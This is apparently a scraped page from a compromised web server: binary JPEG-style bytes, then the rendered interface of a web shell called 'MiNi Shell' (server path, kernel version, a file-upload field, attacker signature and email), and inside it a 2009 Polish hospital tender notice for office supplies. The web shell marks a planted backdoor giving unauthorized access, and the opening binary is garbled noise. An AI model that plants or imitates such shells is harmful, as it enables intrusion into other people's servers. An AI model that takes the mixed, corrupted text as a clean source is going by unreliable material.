JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/151408-N-2009.html

<p class="kh_header"><b>Łódź: Przetarg  nieograniczony o  wartości  nie przekraczającej 206 000 EURO na  dostawę  artykułów  biurowych dla  W.S.S. im.  M.  Kopernika  w  Łodzi</b><br>
<b>Numer ogłoszenia: 151408 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Mikołaja Kopernika , ul. Pabianicka 62, 93-513 Łódź, woj. łódzkie, tel. 042 6895910, 6895912, faks 042 6895911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg  nieograniczony o  wartości  nie przekraczającej 206 000 EURO na  dostawę  artykułów  biurowych dla  W.S.S. im.  M.  Kopernika  w  Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia został podzielony na 11 pakietów: PAKIET 1 Materiały piśmienne, PAKIET 2 Papier ksero i składanka komputerowa, PAKIET 3 Pojemniki do archiwizacji kostek parafinowych i kasetek histopatologicznych, PAKIET 4 Koperty, PAKIET 5 Papier video printer, PAKIET 6 Recepty, PAKIET 7 Etykiety samoprzylepne, PAKIET 8 tonery do kserokopiarek, PAKIET 9 Tonery do faksów, PAKIET 10 Tonery kalkowe do drukarek termoransferowych, PAKIET 11 Artykuły biurowe..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 22.81.50.00-6, 30.19.71.00-7, 30.19.29.30-9, 30.19.91.30-0, 30.19.21.25-3, 30.19.21.30-1, 30.19.95.00-5, 22.82.00.00-8, 30.19.72.20-4, 24.91.00.00-6, 22.99.32.00-9, 30.23.43.00-1, 30.14.51.00-8, 30.19.76.44-2, 30.19.91.20-7, 30.19.92.30-1, 22.90.00.00-9, 30.19.28.00-9, 30.12.51.20-8, 30.12.51.20-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Przystępując do przetargu Wykonawca jest obowiązany wnieść wadium w łącznej wysokości  7 009,00 zł ( słownie: siedem tysięcy dziewięć złotych) Wadium  jest  podzielone  na  części. W związku z powyższym Wykonawca zobowiązany jest wnieść wadium na poszczególne  pakiety w następujących wysokościach: PAKIET 1 - 918,00 zł, PAKIET 2 - 1 346,00 zł, PAKIET 3 - 252,00 zł, PAKIET 4 - 1 312,00 zł, PAKIET 5 - 336,00 zł, PAKIET 6 - 366,00 zł, PAKIET 7 - 651,00 zł, PAKIET 8 - 916,00 zł, PAKIET 9 - 421,00 zł, PAKIET 10 - 166,00 zł, PAKIET 11 - 325,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca musi spełniać warunki udziału w postępowaniu określone w art. 22 ust. 1  pkt. 1 - 4 ustawy Prawo Zamówień Publicznych. Nie może podlegać wykluczeniu z postępowania w oparciu o art. 24 ustawy Prawo Zamówień Publicznych. Ocena warunków udziału w postępowaniu będzie odbywać sie na podstawie załączonych dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A: Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;B: Oświadczenie Wykonawcy z art. 22 ust.1  pkt 4; C:Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt A składa: dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kopernik.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W.S.S. im. M. Kopernika w Łodzi ul. Pabianicka 62, 93-513 Łódź, pokój 978.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 10:00, miejsce: W.S.S. im. M. Kopernika w Łodzi ul. Pabianicka 62, 93-513 Łódź, Kancelaria Szpitala.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 Materiały piśmienne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zeszyt  A-5 - 96 kart.szt.-100; 2.Zeszyt A-4 twarda oprawa - 96 kart.szt.-200;
3.Zeszyt 2/3 A4 twarda oprawa, 200 kart.szt.-30; 4.Blok z makulatury w kratkę 100 kart.	szt.-50;5.Kieszeń foliowa  A-4,op.= 100 szt.-200;6.Zszywki małe 20/5	op. = 1000 szt.-100;7.Zszywki średnie 24/6,op. = 1000 szt.	-400; 8.Zszywki duże 39/13	op. = 1000 szt.-10;9.Korektory w pisaku,szt.-40;10.Kalka ołówkowa A-4,op.= 100 szt.-10;11.	Markery Typu Scharpie czarne - przeznaczone do pisania po szkle, rysik średni lub równoważne,	szt.-250;12.Ołówki,szt.-150;13. Segregatory 7 cm lakierowany,szt.-500;14.Segregatory 5 cm  lakierowany,szt.-100;15.Skoroszyty  oczkowe karton,szt.-800;16.Skoroszyty  oczkowe plast.,szt.-300;17.Skorowidze A-4 twarda oprawa,szt.-50;18.Teczka wiązana A-4,	szt.-2000;19.Spinacze biurowe małe,op.= 100 szt.-600;20.Spinacze biurowe duże,op.= 100 szt.-300;21.Klej biurowy w płyn- 50 ml,szt.-250;22.Papier fax 210 mm x 30 m, 	rol.-150;23.	Papier fax 216 mm x 30 m,rol.-50;24.Płyty CD,szt.-40 000;25.Rolka 60 mm x 30 m termoczuła,szt.-300.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 22.81.50.00-6, 30.19.71.00-7, 30.19.29.30-9, 30.19.91.30-0, 30.19.21.25-3, 30.19.21.30-1, 30.19.95.00-5, 22.80.00.00-8, 30.19.72.20-4, 24.91.00.00-6, 22.99.32.00-9, 30.23.43.00-1, 30.14.51.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET  2 Papier ksero i składanka komputerowa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Papier biały  A4	ryza= 500 arkuszy, ryz-5000,gramatura 80 g/m2, uniwersalny, klasy B, białość min. 145 wg skali CIE;2.Papier biały  A3,ryza= 500 arkuszy, ryz-60,gramatura 80 g/m2, uniwersalny, klasy B, białość min. 145 wg skali CIE;
3.Składanka komputerowa 250 mm x 12 (1+ 0 kopii),karton = 2000 składek, szt-10, Bez nadruku, biały, gramatura 60g/m2;4.Składanka komputerowa 250 mm x 12 (1+1 kopia),karton = 900 składek, szt-3,Bez nadruku, oryginał biały, kopia - kolor, gramatura 53-57 g/m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.91.20-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3 Pojemnik do archiwizacji kostek parafinowych i kasetek histopatologicznych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kartonowe pudełko do przechowywania i archiwizacji materiału biologicznego zatopionego w parafinie ( bloczki lub kasetki ),szt.-500,a)wym.: 290 x 400 x 50 mm (+/- 10 mm),b) poj: na ok. 356 kasetek histopatologicznych,c) wewnątrz kratownica kartonowa,d) pudełko z niezależną pokrywą.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.95.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4 Koperty.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.koperta C 6,op.=1000,szt.-15,Biała;2.koperta B 5,szt.-30 000,Szara lub brązowa bez zakładki;3.koperta B 5,op.=500,szt.-60,Szara lub brązowa z zakładką;4.koperta B4,op.=250 szt.-300,Szara lub brązowa z zakładką;5.koperta 23 cm x 27 cm,szt.-15 000;karton gramatura 120 g/m2 z nadrukiem wg wzoru;6.koperta 23 cm x 32 cm, szt.-15 000,Teczka kartonowa segmentowa bez nadruku brzegi zmocnione;7.koperta 37 cm x 37 cm RTG,szt.-5 000,Szara lub brązowa;8.koperta 37 cm x 45 cm RTG, szt.-10 000, Szara lub brązowa;9.koperta na CD,szt.-40 000,koperta z okienkiem..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.30-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5 Papier Video Printer.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Papier Video Printer 110 mm x 21 mm,szt.-200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.99.31.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6 Recepty.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Recepta	205 mm x 94 mm,Jednostronny,Offset,Blok 100 kart. szt-6000,Nadruk kodów kreskowych i numeracji zgodny z wymogami Narodowego Funduszu Zdrowia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7 Etykiety samoprzylepne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Etykieta samoprzylepna papier typu velum, A-6,Termo transferowa biała z nadrukiem wg wzoru,Rolka =200 szt. etykiet,rolek-1200;2.Etykieta samoprzylepna papier typu velum	 szer x wys 60 mm x 40 mm,Termo transferowa biała bez nadruku	ELTRON TLP  2742,Średnica wew. rolki - 40 mm,Rolka =1000 szt. etykiet, rolek-600;
3.Etykieta samoprzylepna papier typu velum, szer x wys 80 mm x 40 mm,Termo transferowa biała bez nadruku,DATAMAX CLASS DMX E -4203,Średnica wew. rolki - 24 mm,Rolka =1000 szt. etykiet,rolek-80;4.Etykieta samoprzylepna papier typu velum,szer x wys  32 mm x  20 mm, Termo CZUŁA biała bez nadruku,ELETRON LP 2722,Średnica wew. Rolki - 38 mm,	Rolka =2500 szt. etykiet, rolek-100;5.Etykieta samoprzylepna papier typu velum szer x wys 80 mm x  50 mm, Termo transferowa żółta  bez nadruku TOSHIBA BSA 4 TM, Średnica wew. Rolki - 76 mm,Rolka =1000 szt. etykiet, rolka-150.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.28.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8 Tonery do kserokopiarek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. AL 110 DC lub równoważny, kserokopiarka-SHARP AL 1217,Szt.-10;2.	KONICA 2028 lub równoważny,kserokopiarka-KONICA 2028,Szt.-6;3.KONICA 1212 lub równoważny,kserokopiarka-KONICA 1212,Szt.-18;4.KONICA 7020 lub równoważny,	kserokopiarka-KONICA 7020,Szt.-7;5. GESTETNER 2510 lub równoważny,kserokopiarka-GESTETNER NRG MP 2510 PCL6,Szt.-15;6.RICOH 3200 D lub równoważny,kserokopiarka-RICOH AF 450,Szt.-12;7.JP 6 lub równoważny, Powielacz RICOH JP 1010,Szt.	-12;8.matryca JP10-S lub równoważny,Powielacz RICOH JP 1010,Szt.-4;9.	OLIVETTI d-COPIA 163 MF6k lub równoważny, kserokopiarka-OLIVETTI d-COPIA 164/MF,Szt.-6;10.OLIVETTI d-COPIA 160 /200MF lub równoważny, kserokopiarka-OLIVETTI d-COPIA 200/MF,Szt.-8;11.NPG1 lub równoważny, kserokopiarka-CANON NP6216,Szt.-10;12. NPG 11 lub równoważny, kserokopiarka-CANON NP6512,Szt.-40;13. E30 lub równoważny, kserokopiarka	CANON FC 230,Szt.	-5;14.CANON C-EXV3 lub równoważny,kserokopiarka-CANON IR 2800	Szt.-6;15.CANON FX 10, kserokopiarka-CANON L 100,	Szt.-5;16.CANON NP 1010/1020 lub równoważny, kserokopiarka-CANON NP1010,Szt.-20;17.1360 lub równoważny, kserokopiarka-TOSHIBA 1360,Szt.-16.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.20-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9 Tonery do faksów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. PANASONIC KX FA 136 a lub równoważny,Szt.-50;2.PANASONIC KX FA 76 a lub równoważny,Szt.-15;3.	PANASONIC KX FA 57 lub równoważny,Szt.-20;4.PANASONIC KX FA 137 lub równoważny,Szt.-30;5.PANASONIC KX FA 52 lub równoważny,Szt.-10;
6.PANASONIC KX FA 134 lub równoważny,Szt.-20;7.PANASONIC KX FA 87 lub równoważny,Szt.-30;8.	PANASONIC KX FA 83 lub równoważny,Szt.-20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.20-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10 Tonery kalkowane do drukarek termotransferowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.DATAMAX CLASS DMX E-4203,TRANSFER ( woskowo - żywiczna ),104 mm x 94 mb.,0,5 x 108 mm	,OUT,	F,szt.-60;2.ELTRON TLP 2742	TRANSFER (woskowo-żywiczna),64 mm x 74 mb.,0,5 x 110 mm,	IN,F,szt.-150;3.TOSHIBA BSA 4 TM, TRANSFER (woskowo - żywiczna),89 mm x 300 mb.,0,5 x 117 mm,OUT,F,szt.-50;4.	ELTRON TLP 2824,TRANSFER (woskowo - żywiczna),64 mm x 74 mb.,0,5 x 64 mm,IN,F,szt-50.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11 Artykuły biurowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kieszeń foliowa A-4,op.= 100, szt.-10;2.Segregatory 7 cm lakierowany,szt.-30;3.	Zszywki 24/6,op.= 1000,szt.-5;4.Markery cienkie czarne,szt.-12;5.Cienkopisy zielony,szt.-10;6.Cienkopisy czarny,Szt.-20;7.Zakreślacze,op. = 6, szt.-3;8.  długopisy kulkowe, szt.-10;9.Korektory w pisaku,szt.-3;10.Skoroszyty oczkowe plast.,szt.-200;11.Spinacze biurowe małe	op.= 100,szt.-2;12.Klej biurowy w płyn- 50 ml,szt.-10;13.Płyty CD z kopertą,szt.-1 000;14.	Koperta B 4,op.=250, szt.-1;15.	Koperta C 6,op.=1000,szt.-1;16.koperta C6/C5 NK Nevada do automatycznego pakowania z oknem prawym nadruk,	op = 1000, szt.-150;17.Nożyczki duże,szt.-3;18.Zszywacz średni,szt.-3;19.paski przylepne fluorescencyjne, op-40; 20.kartki przylepne 76/51,op-30;21.kartki przylepne 76/76,op-40;22.dziurkacz duży	szt.-2;23.taśma klejąca wąska,szt.-5;24.taśma klejąca szeroka,szt.-5;25.Toner do drukarki Lexmark T640,szt.-2;26.toner do kserokopiarki Konica 7020,szt.-3.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.95.00-5, 30.19.71.00-7, 30.19.21.25-3, 30.19.21.21-5, 30.19.29.30-9, 22.80.00.00-8, 30.19.72.20-4, 24.91.00.00-6, 30.23.43.00-1, 30.19.92.30-1, 39.24.12.00-5, 30.19.73.20-5, 30.19.73.30-8, 44.42.42.00-0, 30.12.51.10-5, 30.12.51.20-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com